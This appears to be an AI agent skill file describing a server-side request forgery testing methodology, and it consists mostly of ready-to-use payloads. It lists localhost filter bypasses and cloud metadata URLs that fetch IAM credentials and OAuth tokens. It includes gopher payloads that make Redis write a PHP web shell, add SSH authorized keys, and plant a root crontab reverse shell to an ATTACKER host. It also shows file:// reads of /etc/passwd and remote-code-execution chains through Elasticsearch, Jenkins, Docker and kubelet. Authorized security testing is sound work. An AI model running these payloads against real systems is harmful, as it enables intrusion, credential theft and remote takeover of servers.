| name | ssrf-testing |
| description | Comprehensive Server-Side Request Forgery (SSRF) testing methodology covering basic SSRF, blind SSRF, DNS rebinding, cloud metadata exploitation, and gopher/redis attacks. Includes bypass techniques and automation. |
SSRF Testing Methodology
Overview
Server-Side Request Forgery (SSRF) allows attackers to make the server perform requests to arbitrary destinations. This skill covers all SSRF variants including cloud metadata exploitation and protocol smuggling.
SSRF Detection
Basic Detection
http://127.0.0.1:80
http://127.0.0.1:443
http://127.0.0.1:22
http://127.0.0.1:8080
http://127.0.0.1:3000
http://127.0.0.1:8000
http://127.0.0.1:9000
http://127.0.0.1:5000
Alternative Localhost Representations
http://127.0.0.1
http://127.1
http://127.0.1
http://0.0.0.0
http://0
http://0177.0.0.1 (octal)
http://2130706433 (decimal)
http://0x7f000001 (hex)
http://localhost
http://localhost:80
IPv6 Localhost
http://[::1]
http://[::]
http://[::ffff:127.0.0.1]
http://[0:0:0:0:0:0:0:1]
DNS Spoofing for Bypass
http://spoofed.burpcollaborator.net
http://localtest.me
http://lvh.me
Cloud Metadata Endpoints
AWS Metadata
http://169.254.169.254/latest/meta-data/
http://169.254.169.254/latest/user-data
http://169.254.169.254/latest/meta-data/ami-id
http://169.254.169.254/latest/meta-data/instance-id
http://169.254.169.254/latest/meta-data/identity-credentials/ec2/security-credentials/ec2-instance
http://169.254.169.254/latest/meta-data/iam/security-credentials/ROLE_NAME
http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key
http://169.254.169.254/latest/meta-data/network/interfaces/macs/
Azure Metadata
http://169.254.169.254/metadata/instance?api-version=2021-02-01
http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com
GCP Metadata
http://metadata.google.internal/computeMetadata/v1/
http://169.254.169.254/computeMetadata/v1/
http://metadata.google.internal/computeMetadata/v1/instance/
http://metadata.google.internal/computeMetadata/v1/project/
DigitalOcean Metadata
http://169.254.169.254/metadata/v1/
Alibaba Cloud
http://100.100.100.200/latest/meta-data/
Oracle Cloud
http://169.254.169.254/opc/v1/instance/
Packet/Equinix
https://metadata.packet.net/metadata
SSRF Exploitation
Basic Internal Network Scanning
http://192.168.0.1:80
http://192.168.1.1:80
http://10.0.0.1:80
http://172.16.0.1:80
http://10.0.0.0:8080
http://internal.company.com
Port Scanning via SSRF
http://127.0.0.1:22 # SSH
http://127.0.0.1:25 # SMTP
http://127.0.0.1:53 # DNS
http://127.0.0.1:80 # HTTP
http://127.0.0.1:443 # HTTPS
http://127.0.0.1:445 # SMB
http://127.0.0.1:3306 # MySQL
http://127.0.0.1:3389 # RDP
http://127.0.0.1:5432 # PostgreSQL
http://127.0.0.1:6379 # Redis
http://127.0.0.1:9200 # Elasticsearch
http://127.0.0.1:11211 # Memcached
Bypass Techniques
URL Encoding
http://127.0.0.1 → http://%31%32%37%2e%30%2e%30%2e%31
http://127.0.0.1 → http://0x7f.0x00.0x00.0x01
http://127.0.0.1 → http://0177.0000.0000.0001
http://127.0.0.1 → http://2130706433
Double Encoding
http://%2531%2532%2537%252e%2530%252e%2530%252e%2531
URL Parser Confusion
http://1.1.1.1 &@2.2.2.2# @3.3.3.3/
http://127.0.0.1:80#@google.com:80/
http://google.com:80\@127.0.0.1:80/
http://google.com:80?@127.0.0.1:80/
http://127.0.0.1/google.com
Redirect Bypass
<?php header("Location: http://127.0.0.1/"); ?>
Then use: http://attacker.com/redirect.php
DNS Rebinding
Setup:
- Create a DNS record with short TTL
- First response: attacker IP
- Second response: target IP (127.0.0.1)
Attack flow:
- Target resolves domain to attacker-controlled IP
- SSRF tool validates URL against attacker IP (allowed)
- DNS TTL expires
- Server resolves domain again → gets 127.0.0.1
- Server makes request to 127.0.0.1
Tools:
- singularity of rebinder
- Whonow
- rbndr
Protocol Smuggling
File Protocol
file:///etc/passwd
file:///C:/windows/win.ini
file://127.0.0.1/etc/passwd
Dict Protocol
dict://127.0.0.1:11211/stat
dict://127.0.0.1:6379/info
Gopher Protocol (Powerful)
# Redis commands via gopher
gopher://127.0.0.1:6379/_FLUSHALL%0D%0ASET%20xx%20%22%3C%3Fphp%20system(%24_GET%5B%27cmd%27%5D)%3B%3F%3E%22%0D%0ACONFIG%20SET%20dir%20%2Fvar%2Fwww%2Fhtml%0D%0ACONFIG%20SET%20dbfilename%20shell.php%0D%0ASAVE
# MySQL via gopher
gopher://127.0.0.1:3306/_\x00\x00\x00\x0a...
# SMTP via gopher
gopher://127.0.0.1:25/_MAIL%20FROM%3A%3Croot%40localhost%3E%0D%0ARCPT%20TO%3A%3Croot%40localhost%3E%0D%0ADATA%0D%0Atest
FTP Protocol
ftp://127.0.0.1:21
ftp://attacker.com:2121
TFTP Protocol
tftp://127.0.0.1:69/TEST
LDAP Protocol
ldap://127.0.0.1:389/
ldap://127.0.0.1:389/%0astats%0aquit
SSH Protocol
ssh://127.0.0.1:22
HTTP Header Injection
GET / HTTP/1.1
Host: target.com
X-Forwarded-Host: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Real-IP: 127.0.0.1
X-Originating-IP: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
Client-IP: 127.0.0.1
True-Client-IP: 127.0.0.1
CF-Connecting-IP: 127.0.0.1
Redis SSRF Exploitation
Web Shell via Redis
gopher://127.0.0.1:6379/_CONFIG%20SET%20dir%20%2Fvar%2Fwww%2Fhtml%0D%0ACONFIG%20SET%20dbfilename%20shell.php%0D%0ASET%20xx%20%22%3C%3Fphp%20system(%24_GET%5B%27cmd%27%5D)%3B%3F%3E%22%0D%0ASAVE
SSH Key via Redis
# Generate SSH key
ssh-keygen -t rsa -C "xx@xx.com"
# URL encode key and inject
gopher://127.0.0.1:6379/_CONFIG%20SET%20dir%20%2Froot%2F.ssh%0D%0ACONFIG%20SET%20dbfilename%20authorized_keys%0D%0ASET%20xx%20%22URL_ENCODED_KEY%22%0D%0ASAVE
Crontab via Redis
gopher://127.0.0.1:6379/_CONFIG%20SET%20dir%20%2Fvar%2Fspool%2Fcron%2Fcrontabs%0D%0ACONFIG%20SET%20dbfilename%20root%0D%0ASET%20xx%20%22%5Cn%5Cn%2A%20%2A%20%2A%20%2A%20%2A%20bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2FATTACKER%2FPORT%200%3E%261%5Cn%5Cn%22%0D%0ASAVE
Blind SSRF
DNS Callback Detection
http://burp-collaborator.net/
http://interactsh.com/
http://requestbin.net/
Time-Based Detection
http://127.0.0.1:22/ # Fast response if SSH running
http://127.0.0.1:3306/ # Fast response if MySQL running
http://127.0.0.1:9999/ # Timeout if nothing running
Error-Based Detection
# Different error messages indicate port/service
http://127.0.0.1:22/ # SSH version string
http://127.0.0.1:80/ # HTTP response
Automation Tools
SSRFmap
python3 ssrfmap.py -r request.txt -p url -m readfiles,portscan
python3 ssrfmap.py -r request.txt -p url -m portscan
Burp Collaborator
http://burpcollaborator.net/unique-id
interactsh
interactsh-client
http://unique-id.interact.sh
SSRF to RCE
Via Redis
See Redis exploitation above.
Via Elasticsearch
# Create malicious script
POST http://127.0.0.1:9200/_search
{
"script": {
"source": "java.lang.Runtime.getRuntime().exec('calc.exe')"
}
}
Via Jenkins
# Groovy script execution
http://127.0.0.1:8080/script
# Post body: println "whoami".execute().text
Via Docker API
# If Docker socket exposed (usually 2375, 2376)
http://127.0.0.1:2375/containers/json
http://127.0.0.1:2375/containers/create?name=rce
http://127.0.0.1:2375/containers/rce/start
Via Kubernetes API
# If kubelet exposed
http://127.0.0.1:10250/pods
http://127.0.0.1:10250/run/namespace/pod/container?cmd=whoami
SSRF Chains
Step 1: Discover Internal Services
http://127.0.0.1:PORT # For each common port
Step 2: Extract Cloud Credentials
http://169.254.169.254/latest/meta-data/iam/security-credentials/ROLE_NAME
Step 3: Chain to Internal Services
# If Elasticsearch found on internal network
http://127.0.0.1:9200/_cat/indices
http://127.0.0.1:9200/_search?q=*
Step 4: Achieve RCE
# Via Redis, Elasticsearch, Docker, etc.
Testing Checklist
References
- PortSwigger SSRF Labs
- PayloadsAllTheThings SSRF
- HackTricks Cloud SSRF
- SSRF Bible